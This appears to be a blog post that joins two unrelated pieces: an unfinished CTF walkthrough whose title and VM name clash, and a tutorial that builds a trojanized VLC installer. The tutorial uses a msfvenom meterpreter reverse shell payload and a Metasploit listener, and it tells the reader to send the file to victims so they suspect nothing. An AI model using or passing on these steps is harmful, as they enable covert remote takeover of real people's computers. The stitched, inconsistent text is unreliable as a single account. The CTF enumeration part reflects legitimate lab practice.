Hack the Game of Thrones CTF (CTF Challenge part 1)

Hello friends! Today we are going to take another CTF challenge known as C0m80. The credit for making this vm machine goes to “OscarAkaElvis” and it is another capture the flag challenge in which our goal is to get all the flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.133 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -p- -sV 192.168.1.133 

   

We find that port 80 is running http, so we open the ip in our browser.

We take a look at the source code and find the flag syntax.

Use dirb to enumerate the ports.

dirb http://192.168.1.133

We find the robots.txt file, we open it and find few directories.

We open the directory /secret-island/ using user-agent Three-eyed-raven

 

We open it and find a link to a map.

 

When we open the map we find the location of all the flags.

We open the directory called /direct-access-to-kings-landing/ using user-agent Three-eyed-raven.

We open the directory and take a look at the source code and find what looks like port for port knocking  

and to user  as oberynmartell.

We then find /h/i/d/d/e/n/ directory using dirb and we open it.

We take a look at the source code and find password for oberynmartell.

We use ftp to connect we use the username and password we previously found to login. We get the first flag as soon we login.

We find two files and download through ftp and find a file that gives us the type of hash it uses.

We save the hash in a file.

 

Now we use john the ripper to decrypt the file and find the password to be stark

John –format=dynamic_2008 hash.txt

Now we use mcrypt to decrypt the encrypted file we found in the ftp server.

Mcrypt -d the_wall.txt.nc

We now add the domain winterfell.7kingdoms.ctf to /etc/hosts and open the link found in the file.

We login using the username and password to login, and find a page with two images. 

We take a look at the source code, and we find the second flag.

Along with the second flag we also find a hint that it contains something, so we download the file and use strings to take a look inside the file and find a domain name.

strings stark_shield.jpg

It hints us that TXT record will contain something useful so we use nslookup to check the TXT records.  We had to make some changes to the domain name to make it valid, and we find our 3^rd flag.

nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133

Now we add the new domain name to /etc/hosts and open the link found in TXT record above.

 

Bind payload using SFX archive with Trojanizer

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable (.exe) archive. The SFX archive when executed it will run both files (our payload and the legit application at the same time).

How to get Trojanizer?

You can clone using this Github link:

Command: git clone https://github.com/r00t-3xp10it/trojanizer.git

Now Before Running the Trojanizer we will create a payload using msfvenom

Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exe

Running Trojanizer

Open the terminal in the Directory where you have cloned the git file. Here you will find a Trojanizer.sh File run it using

Command: ./Trojanizer.sh

Trojanizer has some prerequisites which it will try to install on the initial run. If it could install you could install manually the below mentioned prerequisites.

Wine Program Files, WinRAR Software and Zenity.

After Loading the Tool, it will ask you if you want to execute the Framework

Clicking Yes Will Open a Window Titled Payload to Be Compressed, here we will select the payload that we created using msfvenom in the beginning of the practical.

After selecting the payload another window will open titled Legit Application to Trojanize

Here we will have to select any legit or original software file (.exe) to bind with our payload. I am binding VLC Player Installer File with my payload.

After clicking OK we will be asked for a New Name for the combined file. Keep it like any installer File. For Example: vlc-32bit-Installer or vlc-update64 or anything of your choice.

Now we will have to select any icon for our combined file. You can choose from the list given by default or you can download any icon file (.ico) from Google.

I have downloaded the VLC Icon. As you can see in the above image I am adding the vlc-icon.ico file as an icon.

Note: Trojanizer works with WINRAR and because of that many a times this icon doesn’t bind with the combined file, instead it shows a WinRAR icon. It is a bug we soon hope will be fixed.

After selecting the icon file. You will be granted with this window informing you about the path of the newly payload combined software.

Now Let’s Start a Listener on the port we mentioned as a lhost earlier. Start with opening Metasploit Framework by typing

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.111

msf exploit(multi/handler) > set lport 4466

msf exploit(multi/handler) > run

Now send the malicious software to the victim by any means you desire.

When the user will open the file, he will be greeted with the normal security warning as it is normally shown.

After clicking Run the user will have the VLC installer running and he won’t suspect anything.

But as he clicks Run we will also have his meterpreter session as shown below.

That’s how we can bind our payload file with any original software file (.exe) using Trojanizer.